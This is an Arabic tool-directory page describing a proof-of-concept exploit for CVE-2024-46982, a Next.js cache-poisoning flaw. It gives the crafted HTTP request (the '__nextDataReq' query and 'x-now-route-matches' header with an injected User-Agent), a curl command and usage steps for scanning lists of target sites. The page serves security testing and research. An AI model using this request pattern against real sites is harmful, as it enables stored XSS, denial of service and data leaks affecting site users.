Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-46982 — إثبات المفهوم CVE-2024-46982 | Kitploit
أدوات/GitHubGitHub/lercas/cve-2024-46982
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويب
GitHublercas/cve-2024-46982

CVE-2024-46982

إثبات المفهوم CVE-2024-46982

عرض المستودع
51منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال تسميم ذاكرة التخزين المؤقت في Next.js

تعمل هذه الأداة على أتمتة اكتشاف واستغلال CVE-2024-46982، وهي ثغرة تسميم ذاكرة التخزين المؤقت في Next.js، حيث يمكن تخزين استجابات التقديم من جانب الخادم (SSR) مؤقتًا بشكل غير صحيح كاستجابات توليد المواقع الثابتة (SSG). قد يؤدي هذا التكوين الخاطئ إلى XSS المخزنة، وحجب الخدمة (DoS)، وتسريب البيانات، مما يسمح للمهاجمين بحقن محتوى ضار في الاستجابات المخزنة مؤقتًا.

التثبيت والاستخدام

تجهيز قائمة الأهداف

أنشئ ملفًا باسم targets.txt يحتوي على عنوان URL هدف واحد في كل سطر:

root@kitploit:~
https://vulnerable-site.com
https://another-target.com

تحديد الحمولات المخصصة

أنشئ ملفًا باسم payloads.txt يحتوي على حمولات سيتم حقنها عبر ترويسة User-Agent:

root@kitploit:~

تشغيل الاستغلال

قم بتجميع الاستغلال وتنفيذه باستخدام:

root@kitploit:~
go run exploit.go -f targets.txt -p payloads.txt -d 5

كيف يعمل

  • يقرأ قائمة عناوين URL المستهدفة من targets.txt
  • يمر عبر كل هدف ويضيف نقطة النهاية المعرضة للثغرة:
root@kitploit:~
GET /poc?__nextDataReq=1 HTTP/1.1
Host: vulnerable-site.com
User-Agent: <PAYLOAD>
x-now-route-matches: 1
  • يرسل طلبات متعددة، يستخدم كل منها حمولة مختلفة من payloads.txt
  • يحلل استجابة HTTP بحثًا عن مؤشرات الحقن الناجح:
    • إذا ظهرت الحمولة في نص الاستجابة ← الهدف معرّض للثغرة
    • إذا كان رمز الاستجابة 200 OK وسلوك التخزين المؤقت غير طبيعي ← يحتمل أن يكون معرّضًا للثغرة
    • إذا كان رمز الاستجابة 403 Forbidden أو 404 Not Found ← من المحتمل أنها مُعالَجة
  • يعرض النتائج بعد اختبار جميع الأهداف

للتحقق اليدوي:

أرسل طلبًا ضارًا باستخدام curl:

root@kitploit:~
curl -X GET "https://vulnerable-site.com/poc?__nextDataReq=1" \
     -H "User-Agent: " \
     -H "x-now-route-matches: 1"

قم بزيارة نقطة النهاية في المتصفح

المتطلبات

  • Go 1.21 أو أحدث.
تنزيل الأداة